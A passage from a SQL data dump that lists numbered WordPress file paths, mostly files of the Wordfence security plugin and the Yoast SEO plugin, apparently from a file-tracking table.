ence/views/scanner/no-issues.php'),(5407,'wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php'),(5408,'wp-content/plugins/wordfence/views/scanner/options-group-advanced.php'),(5409,'wp-content/plugins/wordfence/views/scanner/options-group-basic.php'),(5410,'wp-content/plugins/wordfence/views/scanner/options-group-general.php'),(5411,'wp-content/plugins/wordfence/views/scanner/options-group-performance.php'),(5412,'wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php'),(5413,'wp-content/plugins/wordfence/views/scanner/scan-failed.php'),(5414,'wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php'),(5415,'wp-content/plugins/wordfence/views/scanner/scan-progress-element.php'),(5416,'wp-content/plugins/wordfence/views/scanner/scan-progress.php'),(5417,'wp-content/plugins/wordfence/views/scanner/scan-results.php'),(5418,'wp-content/plugins/wordfence/views/scanner/scan-scheduling.php'),(5419,'wp-content/plugins/wordfence/views/scanner/scan-starter.php'),(5420,'wp-content/plugins/wordfence/views/scanner/scan-type.php'),(5421,'wp-content/plugins/wordfence/views/scanner/scanner-status.php'),(5422,'wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php'),(5423,'wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php'),(5424,'wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php'),(5425,'wp-content/plugins/wordfence/views/scanner/site-cleaning.php'),(5426,'wp-content/plugins/wordfence/views/tools/options-group-2fa.php'),(5427,'wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php'),(5428,'wp-content/plugins/wordfence/views/tours/login-security.php'),(5429,'wp-content/plugins/wordfence/views/waf/debug.php'),(5430,'wp-content/plugins/wordfence/views/waf/firewall-status.php'),(5431,'wp-content/plugins/wordfence/views/waf/option-rate-limit.php'),(5432,'wp-content/plugins/wordfence/views/waf/option-rules.php'),(5433,'wp-content/plugins/wordfence/views/waf/option-whitelist.php'),(5434,'wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php'),(5435,'wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php'),(5436,'wp-content/plugins/wordfence/views/waf/options-group-brute-force.php'),(5437,'wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php'),(5438,'wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php'),(5439,'wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php'),(5440,'wp-content/plugins/wordfence/views/waf/waf-install-manual.php'),(5441,'wp-content/plugins/wordfence/views/waf/waf-install-success.php'),(5442,'wp-content/plugins/wordfence/views/waf/waf-install.php'),(5443,'wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php'),(5444,'wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php'),(5445,'wp-content/plugins/wordfence/views/waf/waf-uninstall.php'),(5446,'wp-content/plugins/wordfence/waf/.htaccess'),(5447,'wp-content/plugins/wordfence/waf/bootstrap.php'),(5448,'wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php'),(5449,'wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php'),(5450,'wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php'),(5451,'wp-content/plugins/wordfence/wordfence.php'),(5452,'wp-content/plugins/wordpress-seo/admin/admin-settings-changed-listener.php'),(5453,'wp-content/plugins/wordpress-seo/admin/ajax/class-recalculate-scores-ajax.php'),(5454,'wp-content/plugins/wordpress-seo/admin/ajax/class-shortcode-filter.php'),(5455,'wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-dismissable-notice.php'),(5456,'wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php'),(5457,'wp-content/plugins/wordpress-seo/admin/ajax.php'),(5458,'wp-content/plugins/wordpress-seo/admin/capabilities/class-abstract-capability-manager.php'),(5459,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-factory.php'),(5460,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-integration.php'),(5461,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-vip.php'),(5462,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-wp.php'),(5463,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager.php'),(5464,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-utils.php'),(5465,'wp-content/plugins/wordpress-seo/admin/capabilities/class-register-capabilities.php'),(5466,'wp-content/plugins/wordpress-seo/admin/class-add-keyword-modal.php'),(5467,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-analysis-worker-location.php'),(5468,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-dev-server-location.php'),(5469,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-location.php'),(5470,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-manager.php'),(5471,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-seo-location.php'),(5472,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-yoast-components-l10n.php'),(5473,'wp-content/plugins/wordpress-seo/admin/class-admin-editor-specific-replace-vars.php'),(5474,'wp-content/plugins/wordpress-seo/admin/class-admin-gutenberg-compatibility-notification.php'),(5475,'wp-content/plugins/wordpress-seo/admin/class-admin-help-panel.php'),(5476,'wp-content/plugins/wordpress-seo/admin/class-admin-init.php'),(5477,'wp-content/plugins/wordpress-seo/admin/class-admin-media-purge-notification.php'),(5478,'wp-content/plugins/wordpress-seo/admin/class-admin-recommended-replace-vars.php'),(5479,'wp-content/plugins/wordpress-seo/admin/class-admin-user-profile.php'),(5480,'wp-content/plugins/wordpress-seo/admin/class-admin-utils.php'),(5481,'wp-content/plugins/wordpress-seo/admin/class-admin.php'),(5482,'wp-content/plugins/wordpress-seo/admin/class-asset.php'),(5483,'wp-content/plugins/wordpress-seo/admin/class-bulk-description-editor-list-table.php'),(5484,'wp-content/plugins/wordpress-seo/admin/class-bulk-editor-list-table.php'),(5485,'wp-content/plugins/wordpress-seo/admin/class-bulk-title-editor-list-table.php'),(5486,'wp-content/plugins/wordpress-seo/admin/class-collector.php'),(5487,'wp-content/plugins/wordpress-seo/admin/class-config.php'),(5488,'wp-content/plugins/wordpress-seo/admin/class-customizer.php'),(5489,'wp-content/plugins/wordpress-seo/admin/class-database-proxy.php'),(5490,'wp-content/plugins/wordpress-seo/admin/class-export.php'),(5491,'wp-content/plugins/wordpress-seo/admin/class-expose-shortlinks.php'),(5492,'wp-content/plugins/wordpress-seo/admin/class-extension-manager.php'),(5493,'wp-content/plugins/wordpress-seo/admin/class-extension.php'),(5494,'wp-content/plugins/wordpress-seo/admin/class-extensions.php'),(5495,'wp-content/plugins/wordpress-seo/admin/class-gutenberg-compatibility.php'),(5496,'wp-content/plugins/wordpress-seo/admin/class-helpscout.php'),(5497,'wp-content/plugins/wordpress-seo/admin/class-keyword-synonyms-modal.php'),(5498,'wp-content/plugins/wordpress-seo/admin/class-license-page-manager.php'),(5499,'wp-content/plugins/wordpress-seo/admin/class-meta-columns.php'),(5500,'wp-content/plugins/wordpress-seo/admin/class-meta-storage.php'),(5501,'wp-content/plugins/wordpress-seo/admin/class-meta-table-accessible.php'),(5502,'wp-content/plugins/wordpress-seo/admin/class-multiple-keywords-modal.php'),(5503,'wp-content/plugins/wordpress-seo/admin/class-my-yoast-proxy.php'),(5504,'wp-content/plugins/wordpress-seo/admin/class-my-yoast-route.php'),(5505,'wp-content/plugins/wordpress-seo/admin/class-option-tab.php'),(5506,'wp-content/plugins/wordpress-seo/admin/class-option-tabs-formatter.php'),(5507,'wp-content/plugins/wordpress-seo/admin/class-option-tabs.php'),(5508,'wp-content/plugins/wordpress-seo/admin/class-paper-presenter.php'),(5509,'wp-content/plugins/wordpress-seo/admin/class-plugin-availability.php'),(5510,'wp-content/plugins/wordpress-seo/admin/class-plugin-compatibility.php'),(5511,'wp-content/plugins/wordpress-seo/admin/class-plugin-conflict.php'),(5512,'wp-content/plugins/wordpress-seo/admin/class-premium-popup.php'),(5513,'wp-content/plugins/wordpress-seo/admin/class-premium-upsell-admin-block.php'),(5514,'wp-content/plugins/wordpress-seo/admin/class-primary-term-admin.php'),(5515,'wp-content/plugins/wordpress-seo/admin/class-product-upsell-notice.php'),(5516,'wp-content/plugins/wordpress-seo/admin/class-recalculate-scores.php'),(5517,'wp-content/plugins/wordpress-seo/admin/class-remote-request.php'),(5518,'wp-content/plugins/wordpress-seo/admin/class-schema-person-upgrade-notification.php'),(5519,'wp-content/plugins/wordpress-seo/admin/class-social-admin.php'),(5520,'wp-content/plugins/wordpress-seo/admin/class-suggested-plugins.php'),(5521,'wp-content/plugins/wordpress-seo/admin/class-yoast-columns.php'),(5522,'wp-content/plugins/wordpress-seo/admin/class-yoast-dashboard-widget.php'),(5523,'wp-content/plugins/wordpress-seo/admin/class-yoast-form.php'),(5524,'wp-content/plugins/wordpress-seo/admin/class-yoast-input-validation.php'),(5525,'wp-content/plugins/wordpress-seo/admin/class-yoast-network-admin.php'),(5526,'wp-content/plugins/wordpress-seo/admin/class-yoast-network-settings-api.php'),(5527,'wp-content/plugins/wordpress-seo/admin/class-yoast-notification-center.php'),(5528,'wp-content/plugins/wordpress-seo/admin/class-yoast-notification.php'),(5529,'wp-content/plugins/wordpress-seo/admin/class-yoast-notifications.php'),(5530,'wp-content/plugins/wordpress-seo/admin/class-yoast-plugin-conflict.php'),(5531,'wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-components.php'),(5532,'wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-endpoint.php'),(5533,'wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-options-adapter.php'),(5534,'wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-page.php'),(5535,'wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-service.php'),(5536,'wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-storage.php'),(5537,'wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-structure.php'),(5538,'wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-translations.php'),(5539,'wp-content/plugins/wordpress-seo/admin/config-ui/components/class-component-mailchimp-signup.php'),(5540,'wp-content/plugins/wordpress-seo/admin/config-ui/components/class-component-suggestions.php'),(5541,'wp-content/plugins/wordpress-seo/admin/config-ui/components/interface-component.php'),(5542,'wp-content/plugins/wordpress-seo/admin/config-ui/factories/class-factory-post-type.php'),(5543,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-choice-post-type.php'),(5544,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-choice.php'),(5545,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-company-info-missing.php'),(5546,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-company-logo.php'),(5547,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-company-name.php'),(5548,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-company-or-person.php'),(5549,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-environment.php'),(5550,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-mailchimp-signup.php'),(5551,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-multiple-authors.php'),(5552,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-person.php'),(5553,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-post-type-visibility.php'),(5554,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-facebook.php'),(5555,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-instagram.php'),(5556,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-linkedin.php'),(5557,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-myspace.php'),(5558,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-pinterest.php'),(5559,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-twitter.php'),(5560,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-wikipedia.php'),(5561,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-youtube.php'),(5562,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-separator.php'),(5563,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-site-name.php'),(5564,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-site-type.php'),(5565,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-success-message.php'),(5566,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-suggestions.php'),(5567,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-title-intro.php'),(5568,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-upsell-configuration-service.php'),(5569,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-upsell-site-review.php'),(5570,'wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field.php'),(5571,'wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-file-size.php'),(5572,'wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-indexable.php'),(5573,'wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-statistics.php'),(5574,'wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint.php'),(5575,'wp-content/plugins/wordpress-seo/admin/endpoints/interface-endpoint-storable.php'),(5576,'wp-content/plugins/wordpress-seo/admin/exceptions/class-file-size-exception.php'),(5577,'wp-content/plugins/wordpress-seo/admin/filters/class-abstract-post-filter.php'),(5578,'wp-content/plugins/wordpress-seo/admin/filters/class-cornerstone-filter.php'),(5579,'wp-content/plugins/wordpress-seo/admin/formatter/class-metabox-formatter.php'),(5580,'wp-content/plugins/wordpress-seo/admin/formatter/class-post-metabox-formatter.php'),(5581,'wp-content/plugins/wordpress-seo/admin/formatter/class-term-metabox-formatter.php'),(5582,'wp-content/plugins/wordpress-seo/admin/formatter/interface-metabox-formatter.php'),(5583,'wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc.php'),(5584,'wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-display.php'),(5585,'wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-redirect-nopremium.php'),(5586,'wp-content/plugins/wordpress-seo/admin/import/class-import-detector.php'),(5587,'wp-content/plugins/wordpress-seo/admin/import/class-import-plugin.php'),(5588,'wp-content/plugins/wordpress-seo/admin/import/class-import-settings.php'),(5589,'wp-content/plugins/wordpress-seo/admin/import/class-import-status.php'),(5590,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-abstract-plugin-importer.php'),(5591,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-aioseo.php'),(5592,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-greg-high-performance-seo.php'),(5593,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-headspace.php'),(5594,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-jetpack.php'),(5595,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-platinum-seo-pack.php'),(5596,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-premium-seo-pack.php'),(5597,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-rankmath.php'),(5598,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seo-framework.php'),(5599,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seopressor.php'),(5600,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-smartcrawl.php'),(5601,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-squirrly.php'),(5602,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-ultimate-seo.php'),(5603,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-woothemes-seo.php'),(5604,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wp-meta-seo.php'),(5605,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wpseo.php'),(5606,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-importers.php'),(5607,'wp-content/plugins/wordpress-seo/admin/index.php'),(5608,'wp-content/plugins/wordpress-seo/admin/interface-collection.php'),(5609,'wp-content/plugins/wordpress-seo/admin/interface-installable.php'),(5610,'wp-content/plugins/wordpress-seo/admin/links/class-link-cleanup-transient.php'),(5611,'wp-content/plugins/wordpress-seo/admin/links/class-link-column-count.php'),(5612,'wp-content/plugins/wordpress-seo/admin/links/class-link-columns.php'),(5613,'wp-content/plugins/wordpress-seo/admin/links/class-link-content-processor.php'),(5614,'wp-content/plugins/wordpress-seo/admin/links/class-link-extractor.php'),(5615,'wp-content/plugins/wordpress-seo/admin/links/class-link-factory.php'),(5616,'wp-content/plugins/wordpress-seo/admin/links/class-link-filter.php'),(5617,'wp-content/plugins/wordpress-seo/admin/links/class-link-installer.php'),(5618,'wp-content/plugins/wordpress-seo/admin/links/class-link-internal-lookup.php'),(5619,'wp-content/plugins/wordpress-seo/admin/links/class-link-notifier.php'),(5620,'wp-content/plugins/wordpress-seo/admin/links/class-link-query.php'),(5621,'wp-content/plugins/wordpress-seo/admin/links/class-link-reindex-dashboard.php'),(5622,'wp-content/plugins/wordpress-seo/admin/links/class-link-reindex-post-endpoint.php'),(5623,'wp-content/plugins/wordpress-seo/admin/links/class-link-reindex-post-service.php'),(5624,'wp-content/plugins/wordpress-seo/admin/links/class-link-storage.php'),(5625,'wp-content/plugins/wordpress-seo/admin/links/class-link-table-accessible.php'),(5626,'wp-content/plugins/wordpress-seo/admin/links/class-link-type-classifier.php'),(5627,'wp-content/plugins/wordpress-seo/admin/links/class-link-utils.php'),(5628,'wp-content/plugins/wordpress-seo/admin/links/class-link-watcher-loader.php'),(5629,'wp-content/plugins/wordpress-seo/admin/links/class-link-watcher.php'),(5630,'wp-content/plugins/wordpress-seo/admin/links/class-link.php'),(5631,'wp-content/plugins/wordpress-seo/admin/listeners/class-listener.php'),(5632,'wp-content/plugins/wordpress-seo/admin/menu/class-admin-menu.php'),(5633,'wp-content/plugins/wordpress-seo/admin/menu/class-base-menu.php'),(5634,'wp-content/plugins/wordpress-seo/admin/menu/class-menu.php'),(5635,'wp-content/plugins/wordpress-seo/admin/menu/class-network-admin-menu.php'),(5636,'wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-editor.php'),(5637,'wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-field.php'),(5638,'wp-content/plugins/wordpress-seo/admin/menu/class-submenu-capability-normalize.php'),(5639,'wp-content/plugins/wordpress-seo/admin/metabox/class-abstract-sectioned-metabox-tab.php'),(5640,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-readability.php'),(5641,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-seo.php'),(5642,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsible.php'),(5643,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsibles-section.php'),(5644,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-editor.php'),(5645,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-form-tab.php'),(5646,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-null-tab.php'),(5647,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-additional.php'),(5648,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-react.php'),(5649,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-readability.php'),(5650,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox.php'),(5651,'wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-analysis.php'),(5652,'wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-section.php'),(5653,'wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-tab.php'),(5654,'wp-content/plugins/wordpress-seo/admin/notifiers/class-configuration-notifier.php'),(5655,'wp-content/plugins/wordpress-seo/admin/notifiers/dismissible-notification.php'),(5656,'wp-content/plugins/wordpress-seo/admin/notifiers/interface-notification-handler.php'),(5657,'wp-content/plugins/wordpress-seo/admin/pages/dashboard.php'),(5658,'wp-content/plugins/wordpress-seo/admin/pages/licenses.php'),(5659,'wp-content/plugins/wordpress-seo/admin/pages/metas.php'),(5660,'wp-content/plugins/wordpress-seo/admin/pages/network.php'),(5661,'wp-content/plugins/wordpress-seo/admin/pages/social.php'),(5662,'wp-content/plugins/wordpress-seo/admin/pages/tools.php'),(5663,'wp-content/plugins/wordpress-seo/admin/recalculate/class-recalculate-posts.php'),(5664,'wp-content/plugins/wordpress-seo/admin/recalculate/class-recalculate-terms.php'),(5665,'wp-content/plugins/wordpress-seo/admin/recalculate/class-recalculate.php'),(5666,'wp-content/plugins/wordpress-seo/admin/roles/class-abstract-role-manager.php'),(5667,'wp-content/plugins/wordpress-seo/admin/roles/class-register-roles.php'),(5668,'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-factory.php'),(5669,'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-vip.php'),(5670,'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-wp.php'),(5671,'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager.php'),(5672,'wp-content/plugins/wordpress-seo/admin/ryte/class-ryte-option.php'),(5673,'wp-content/plugins/wordpress-seo/admin/ryte/class-ryte-request.php'),(5674,'wp-content/plugins/wordpress-seo/admin/ryte/class-ryte.php'),(5675,'wp-content/plugins/wordpress-seo/admin/services/class-file-size.php'),(5676,'wp-content/plugins/wordpress-seo/admin/services/class-indexable-post-provider.php'),(5677,'wp-content/plugins/wordpress-seo/admin/services/class-indexable-provider.php'),(5678,'wp-content/plugins/wordpress-seo/admin/services/class-indexable-term-provider.php'),(5679,'wp-content/plugins/wordpress-seo/admin/services/class-indexable.php'),(5680,'wp-content/plugins/wordpress-seo/admin/services/interface-indexable-provider.php'),(5681,'wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-integration.php'),(5682,'wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-service.php'),(5683,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-columns.php'),(5684,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-content-fields.php'),(5685,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields-presenter.php'),(5686,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields.php'),(5687,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-metabox.php'),(5688,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-settings-fields.php'),(5689,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-social-fields.php'),(5690,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy.php'),(5691,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-default-data.php'),(5692,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-plugin-data.php'),(5693,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-server-data.php'),(5694,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-settings-data.php'),(5695,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-theme-data.php'),(5696,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking.php'),(5697,'wp-content/plugins/wordpress-seo/admin/views/class-view-utils.php'),(5698,'wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggle.php'),(5699,'wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggles.php'),(5700,'wp-content/plugins/wordpress-seo/admin/views/class-yoast-input-select.php'),(5701,'wp-content/plugins/wordpress-seo/admin/views/form/fieldset.php'),(5702,'wp-content/plugins/wordpress-seo/admin/views/form/select.php'),(5703,'wp-content/plugins/wordpress-seo/admin/views/interface-yoast-form-element.php'),(5704,'wp-content/plugins/wordpress-seo/admin/views/js-templates-primary-term.php'),(5705,'wp-content/plugins/wordpress-seo/admin/views/licenses.php'),(5706,'wp-content/plugins/wordpress-seo/admin/views/paper-collapsible.php'),(5707,'wp-content/plugins/wordpress-seo/admin/views/partial-notifications-errors.php'),(5708,'wp-content/plugins/wordpress-seo/admin/views/partial-notifications-template.php'),(5709,'wp-content/plugins/wordpress-seo/admin/views/partial-notifications-warnings.php'),(5710,'wp-content/plugins/wordpress-seo/admin/views/sidebar.php'),(5711,'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/dashboard.php'),(5712,'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/features.php'),(5713,'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/site-analysis.php'),(5714,'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/webmaster-tools.php'),(5715,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/archives/help.php'),(5716,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/archives.php'),(5717,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/breadcrumbs.php'),(5718,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/general.php'),(5719,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/media.php'),(5720,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/author-archive-settings.php'),(5721,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/breadcrumbs-content.php'),(5722,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/date-archives-settings.php'),(5723,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/force-rewrite-title.php'),(5724,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/homepage.php'),(5725,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/knowledge-graph.php'),(5726,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/title-separator.php'),(5727,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general-content.php'),(5728,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/media-content.php'),(5729,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post-type-content.php'),(5730,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post_type/post-type.php'),(5731,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post_type/woocommerce-shop-page.php'),(5732,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/rss-content.php'),(5733,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/special-pages.php'),(5734,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/taxonomy-content.php'),(5735,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/post-types.php'),(5736,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/rss.php'),(5737,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/taxonomies/category-url.php'),(5738,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/taxonomies.php'),(5739,'wp-content/plugins/wordpress-seo/admin/views/tabs/network/features.php'),(5740,'wp-content/plugins/wordpress-seo/admin/views/tabs/network/general.php'),(5741,'wp-content/plugins/wordpress-seo/admin/views/tabs/network/restore-site.php'),(5742,'wp-content/plugins/wordpress-seo/admin/views/tabs/social/accounts.php'),(5743,'wp-content/plugins/wordpress-seo/admin/views/tabs/social/facebook.php'),(5744,'wp-content/plugins/wordpress-seo/admin/views/tabs/social/pinterest.php'),(5745,'wp-content/plugins/wordpress-seo/admin/views/tabs/social/twitterbox.php'),(5746,'wp-content/plugins/wordpress-seo/admin/views/tabs/tool/import-seo.php'),(5747,'wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-export.php'),(5748,'wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-import.php'),(5749,'wp-content/plugins/wordpress-seo/admin/views/tool-bulk-editor.php'),(5750,'wp-content/plugins/wordpress-seo/admin/views/tool-file-editor.php'),(5751,'wp-content/plugins/wordpress-seo/admin/views/tool-import-export.php'),(5752,'wp-content/plugins/wordpress-seo/admin/views/user-profile.php'),(5753,'wp-content/plugins/wordpress-seo/admin/watchers/class-slug-change-watcher.php'),(5754,'wp-content/plugins/wordpress-seo/cli/class-cli-redirect-upsell-command-namespace.php'),(5755,'wp-content/plugins/wordpress-seo/cli/class-cli-yoast-command-namespace.php'),(5756,'wp-content/plugins/wordpress-seo/config/composer/actions.php'),(5757,'wp-content/plugins/wordpress-seo/config/dependency-injection/container-compiler.php'),(5758,'wp-content/plugins/wordpress-seo/config/dependency-injection/custom-loader.php'),(5759,'wp-content/plugins/wordpress-seo/config/dependency-injection/loader-pass.php'),(5760,'wp-content/plugins/wordpress-seo/config/dependency-injection/services.php'),(5761,'wp-content/plugins/wordpress-seo/config/php-codeshift/remove-vendor-prefixing-array-key-visitor.php'),(5762,'wp-content/plugins/wordpress-seo/config/php-codeshift/remove-vendor-prefixing-codemod.php'),(5763,'wp-content/plugins/wordpress-seo/config/php-codeshift/remove-vendor-prefixing-comment-visitor.php'),(5764,'wp-content/plugins/wordpress-seo/config/php-codeshift/remove-vendor-prefixing-visitor.php'),(5765,'wp-content/plugins/wordpress-seo/config/php-scoper/dependency-injection.inc.php'),(5766,'wp-content/plugins/wordpress-seo/config/php-scoper/guzzlehttp.inc.php'),(5767,'wp-content/plugins/wordpress-seo/config/php-scoper/oauth2-client.inc.php'),(5768,'wp-content/plugins/wordpress-seo/config/php-scoper/psr.inc.php'),(5769,'wp-content/plugins/wordpress-seo/config/php-scoper/ruckusing.inc.php'),(5770,'wp-content/plugins/wordpress-seo/css/dist/admin-global-1430-rtl.css'),(5771,'wp-content/plugins/wordpress-seo/css/dist/admin-global-1430.css'),(5772,'wp-content/plugins/wordpress-seo/css/dist/adminbar-1430-rtl.css'),(5773,'wp-content/plugins/wordpress-seo/css/dist/adminbar-1430.css')